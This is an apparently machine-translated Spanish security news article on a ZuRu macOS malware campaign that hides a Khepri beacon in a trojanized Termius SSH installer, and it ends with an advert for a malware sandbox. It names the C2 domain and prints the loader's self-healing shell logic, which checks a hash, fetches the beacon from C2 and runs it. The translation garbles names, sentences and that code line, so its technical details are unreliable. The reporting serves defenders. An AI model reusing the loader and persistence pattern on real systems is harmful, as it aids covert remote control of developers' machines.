Una nueva tensión de la familia de larga duración ha surgido, escondido dentro de un cliental de SSH de Popular Termius y convirtiendo en silencio las estaciones de trabajo de los desarrolladores en puntos de apoyo remotos.
Visto por primera vez a fines de mayo de 2025, la imagen de disco de Rogue Rogue de 248 MB se ve y se comporta como el instalador genuino, pero inserta sigilosamente un binario Mach-O de 25 MB en el paquete de ayudantes de Termius.
Una vez lanzado, el ayudante falsificado ejecuta el Legítimo .Mermius Helper1 para preservar la UX normal mientras genera un cargador denominado .localizado, que deja caer un faro modificado de comando y control de Khepri bajo /tmp/.fseventsd y comienza a encuestar su operador cada cinco segundos sobre el puerto 53.
Analistas de polyswarm identificado El patrón C2 de la muestra – CCTL01.Macnavicat (.) com con el dominio de señuelo Baidu – que lo recurre a la infraestructura de Zuru anterior.
Debido a que el implante cambia la firma del desarrollador de Termius para una ad-hoc, el modelo de confianza de Gatekeeper está evitado, permitiendo que el paquete se ejecute sin diálogos de notarización.
MacOS. éxito
La campaña se dirige específicamente al personal de TI y a los ingenieros de software que favorecen las terminales de terceros, subrayando el creciente riesgo que plantea las aplicaciones de productividad pirateadas o manipuladas.
Más allá del robo de datos, la baliza mejorada puede transferir archivos arbitrarios, ejecutar instrucciones de shell y capturar la salida, otorgando a los operadores un control persistente y de alta fidelidad de las MAC comprometidas.
El resto de este informe perfora el mecanismo de infección que hace que la última construcción de Zuru sea esquiva y resistente.
La primera tarea del cargador es la verificación de integridad. Calcula un hash MD5 del faro residente y, si el resultado diverge desde la suma de verificación codificada dura, lo actualiza silenciosamente del C2 antes de encadenar la ejecución de regreso a la sesión del usuario.
La lógica es compacta pero efectiva:-
Esperado_hash = \ “8ac593fbe69ae93de505003eff446424 \” current_hash = $ (md5 -q /tmp/.fseventsd/khepri) (\ “$ current_hash \”! = \ “$ Esperado /tmp/.fseventsd/khepri chmod +x /tmp/.fseventsd/khepri && /tmp/.fseventsd/khepri & &
Este paso de autocuración frustra las detecciones rudimentarias basadas en archivos al garantizar que la carga útil sea siempre impecable.
Junto con la alternancia de los cinco segundos del corazón y el modo de damón de fondo, Zuru mantiene el acceso de baja latencia incluso a través de reinicios, destacando cómo una sola utilidad comprometida puede cascada en la exposición a la red a gran escala para equipos de ingeniería centrados en macOS.
Aumentar la detección, reducir la fatiga de alerta, acelerar la respuesta; Todo con una caja de arena interactiva construida para equipos de seguridad -> Prueba cualquiera.
